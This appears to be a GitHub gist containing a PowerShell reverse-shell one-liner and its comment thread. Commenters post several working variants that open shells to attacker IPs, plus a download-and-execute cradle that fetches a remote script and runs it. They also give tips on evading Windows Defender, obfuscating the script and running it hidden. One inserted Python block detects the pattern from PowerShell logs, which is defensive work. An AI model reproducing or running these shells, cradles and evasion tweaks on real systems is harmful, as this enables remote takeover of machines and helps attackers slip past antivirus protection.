powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

@ThunderSon ThunderSon commented Jul 9, 2018

Hello. Kindly check my fork to the project. The IP field has a typo.


@egre55 egre55 commented Jul 9, 2018

hey, thanks for the heads up!


@chnz2k chnz2k commented Apr 15, 2019

Using sockets without obfuscation or string encryption is a high risk: Windows can log the data connection to the C&C server, and some firewalls such as ZoneAlarm block the packets.


@T3nsh0 T3nsh0 commented Aug 7, 2019

@chnz2k how do you add obfuscation to a script?


@egre55 egre55 commented Aug 9, 2019

the Invoke-Obfuscation project is definitely worth checking out @PLEASEFORGETME2


@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Which listener can be used? Netcat or msfconsole?


@chnz2k chnz2k commented Jul 25, 2020


@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Ok, but can we obfuscate this script? And when I run the script it says this:

[screenshot: Capture]


@chnz2k chnz2k commented Jul 25, 2020


@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Yes, it is working now! But how do I obfuscate it?


@chnz2k chnz2k commented Jul 25, 2020


@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Thanks Mate!


@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

And where can I scan the .ps1 file for results? It doesn't work on antiscan.me, and NoDistribute also doesn't work.


@chnz2k chnz2k commented Jul 25, 2020


@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Hi!
I tried to run the code and I got a connection, but when I type any command the connection exits, and on the PowerShell side I have output like this:

[screenshot: Capture]
[screenshot: Capture]

Also, I am sharing the code which downloads the reverse shell .ps1 from the Kali server and executes it:
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4/mypowershell.ps1');mypowershell.ps1"


@chnz2k chnz2k commented Jul 25, 2020


@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Also, it ran the first time, but the second time it was detected.


@egre55 egre55 commented Jul 25, 2020

try this: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4:443/mypowershell.ps1')" @Vedant-Bhalgama

with your reverse shell looking like:

$client = New-Object System.Net.Sockets.TCPClient("10.0.2.4",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

you should get a shell on your Netcat listener on port 80


@chnz2k chnz2k commented Jul 25, 2020


@egre55 egre55 commented Jul 25, 2020

if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with "#"


@chnz2k chnz2k commented Jul 25, 2020


@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Yes! I am not using it for non-ethical purposes, bro! I am an ethical hacker and need this for pentesting purposes!


@chnz2k chnz2k commented Jul 25, 2020


@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

The script is running now, but it gives a detection error.
@egre55, what were you telling me to replace to evade Defender? Can you make the changes in the code?

[screenshot: Capture]


@epicn1337 epicn1337 commented Aug 21, 2020

One way or the other this script can be a disaster. This is the best way I run such a script: make sure you add powershell -nop -c in front, as follows:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attackerIP',attackerPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


@Vedant-Bhalgama Vedant-Bhalgama commented Aug 21, 2020

Which listener can be used for this? Netcat?


@egre55 egre55 commented Aug 21, 2020


@Vedant-Bhalgama Vedant-Bhalgama commented Aug 22, 2020

It got detected as MaliciousContent. Anything else? Should I try obfuscation?


@Yashraj-Garnayak Yashraj-Garnayak commented Nov 4, 2020

After executing it in PowerShell with the IP and port changed, it shows "New-Object: exception calling .ctor with 2 argument(s): connection attempt failed". What should I do? I am not a PowerShell expert.
I run the netcat server in VirtualBox.


@chnz2k chnz2k commented Nov 12, 2020


@munteanulc munteanulc commented Jan 11, 2021

The Windows Defender action is triggered by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"
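The Defender hit described in the comment above is string-based, which is exactly why a detection engineer should not key on the prompt string alone: every variant posted in this thread still shares the same behaviour in one script block (a TcpClient is opened, its stream is read, and the received text goes to Invoke-Expression), and, as chnz2k notes earlier, Windows can log it. The following Python is an added example, not code from the gist or any of its commenters. It scores PowerShell ScriptBlock-log text (Event ID 4104 style) against weighted indicators lifted from the one-liners in this thread and returns a verdict per record. The record IDs, the 192.0.2.x addresses, the sample script texts and the function names are all constructed for illustration.

```python
"""Score PowerShell ScriptBlock log text (Event ID 4104 style) for the
reverse-shell pattern discussed in this thread. Added example; all sample
records below are constructed, not real telemetry."""
import re
from dataclasses import dataclass, field

# Weighted indicators taken from the one-liners in the thread.
# Each tuple: (indicator name, compiled regex, weight).
INDICATORS = [
    ("tcp_client", re.compile(r"System\.Net\.Sockets\.TcpClient", re.I), 2),
    ("get_stream", re.compile(r"\.GetStream\(\)", re.I), 2),
    ("invoke_expression", re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 3),
    ("stream_write", re.compile(r"\.Write\(\s*\$\w+\s*,\s*0\s*,", re.I), 1),
    # The string Defender reportedly keys on; deliberately low weight.
    ("prompt_string", re.compile(r"""["']PS ["']\s*\+\s*\(pwd\)\.Path""", re.I), 1),
    ("download_cradle", re.compile(r"\.DownloadString\(", re.I), 2),
]


@dataclass
class Finding:
    record_id: int
    verdict: str  # "reverse_shell", "download_cradle" or "suspicious"
    score: int
    hits: list = field(default_factory=list)


def score_script_block(text):
    """Return (total weight, [names of matching indicators]) for one script block."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def classify(record_id, text, threshold=5):
    """Behaviour-based verdict: the socket/stream/iex triple is decisive on its
    own, so removing the prompt string does not change the outcome."""
    score, hits = score_script_block(text)
    present = set(hits)
    if {"tcp_client", "get_stream", "invoke_expression"} <= present:
        return Finding(record_id, "reverse_shell", score, hits)
    if {"download_cradle", "invoke_expression"} <= present:
        return Finding(record_id, "download_cradle", score, hits)
    if score >= threshold:
        return Finding(record_id, "suspicious", score, hits)
    return None


def triage(records, threshold=5):
    """records: iterable of (record_id, script_text). Returns the findings."""
    findings = []
    for record_id, text in records:
        finding = classify(record_id, text, threshold)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample script-block texts (hypothetical log records).
SAMPLE_RECORDS = [
    # 1: ordinary admin activity, should not fire.
    (1, "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }"),
    # 2: the thread's one-liner shape, prompt string included.
    (2, "$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10',80);"
        "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};"
        "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;"
        "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);"
        "$sendback = (iex $data 2>&1 | Out-String );"
        "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';"
        "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
        "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"),
    # 3: same behaviour with the prompt string swapped out.
    (3, "$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10',4443);"
        "$stream = $client.GetStream();"
        "while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){"
        "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);"
        "$sendback = (iex $data 2>&1 | Out-String);"
        "$sendback2 = $sendback + 'PSReverseShell# ';"
        "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
        "$stream.Write($sendbyte,0,$sendbyte.Length)}"),
    # 4: legitimate TCP reachability check, no stream read, no iex.
    (4, "$c = New-Object System.Net.Sockets.TcpClient('intranet.example.test', 443); "
        "$c.Connected; $c.Close()"),
    # 5: download cradle of the kind posted in the thread.
    (5, "IEX(New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"record {f.record_id}: {f.verdict} (score {f.score}) hits={f.hits}")
```

Records 2 and 3 both come back as reverse_shell (scores 9 and 8), record 5 as download_cradle, and records 1 and 4 produce no finding; the health-check in record 4 shows why a lone TcpClient match is not enough on its own.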


@cnibbler cnibbler commented Feb 11, 2021

Hi, kindly check my fork.

Just a small change to the way commands are run to ensure any non-stdout text is sent back. (except for confirmation prompts).

Without this, due to the way in which the output of a command run by Invoke-Expression is handled, stderr output never gets sent back even with '2>&1' specified in your current format.

Thanks,


@pentestblogin pentestblogin commented Apr 16, 2021

Very nice :)


@pretech86 pretech86 commented Apr 27, 2021

I tried to run it silently with -WindowsStyle Hidden -NoLog but it is not working. How can I run it silently?
